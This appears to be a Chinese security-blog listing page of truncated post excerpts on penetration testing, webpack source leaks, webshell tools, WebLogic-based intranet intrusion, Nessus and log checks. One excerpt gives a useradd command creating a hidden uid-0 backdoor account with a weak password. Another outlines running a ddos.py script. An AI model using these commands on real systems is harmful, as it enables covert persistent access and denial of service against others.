前端存放webpack包，泄露前端源代码扫描出文件上传接口Webpack源代码泄露文件上传格式危害描述：成功上传文件到后台服务器。修复建议：删除前端webpack包，在后端使用白名单限制上传文件类型。...

软件背景近年来，随着信息技术和AI产业的迅速发展，网络安全问题也越来越受到关注。黑客攻击、数据泄露等事件频繁发生，网络安全已经成为社会和企业面临的重大挑战。而最近，我使用python语言开...

免责声明：本文仅作收藏学习之用，亦希望大家以遵守《网络安全法》相关法律为前提学习，切勿用于非法犯罪活动，对于恶意使用造成的损失，和本人及作者无关。介绍黑盒渗透测试意味着白帽子对目标...

前言这篇文章笔者整理了目前所见到过的使用多的Webshell网站管理工具，这里只对这些工具做了简单介绍，并没有写具体使用方式，大家如果有兴趣可以自己去看一下使用说明，同时也欢迎大家补充一些...

 Kali Linux的安装过程本文章不做过多说明，请自行百度1.首先，打开一个终端然后su root进入root2.下载ddos文件包3.cd到ddos包下4.用python执行ddos.py，输入命令：python ddos.py5.再打开一个...

前言我们都经历过那种刹那间的冲动，手指轻轻一划，好友就这样从微信中消失了。但随后的后悔却如影随形，你开始想念那些微不足道的朋友圈互动，晚上点灯的晚安问候，还有不期而遇的共同点滴。'...

一、docker-windows介绍虽然说电脑可以实现双系统，但是有时候啊，像一些堡垒机或者vpn啥的，或者需要windows环境做测试的，你总不能老是切换系统吧，很麻烦，而且用习惯了linux，总是想鼓捣着...

前言内网渗透平时很少能遇到，在平时工作中更加偏向于外网的Web打点之类的工作，所以就找寻国外的服务器进行渗透练手，熟悉下内网渗透的步骤。前情提要，外国服务器存在Weblogic漏洞，通过漏洞...

  一、描述外网打点的流程？靶标确认、信息收集、漏洞探测、漏洞利用、权限获取。最终的目的是获取靶标的系统权限/关键数据。在这个过程中，信息收集最为重要。掌握靶标情报越多，后续就会有...

入侵痕迹隐藏后门帐号添加账号test1，设置uid为0，密码为123456useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G root -s /bin/bash -d /home/test1SSH隐身登录隐...

前言Nessus和AWVS类似，都是一个很好用的扫描工具。我们上个文章说了如何使用Docker安装AWVS，那么这篇文章就带大家安装Nessus吧。环境说明演示机环境： kali演示机IP：192.168.10.100 （请替换...

免责声明由于传播、利用本站所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本站及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删...

l 查看日志信息是否还存在或者是否被清空    ll -h /var/log/*l 查看/etc/passwd及/etc/shadow文件是否存在创建一个新的存放用户名及密码文件ll /etc/passwdll /etc/shadowl查看/etc/passwd...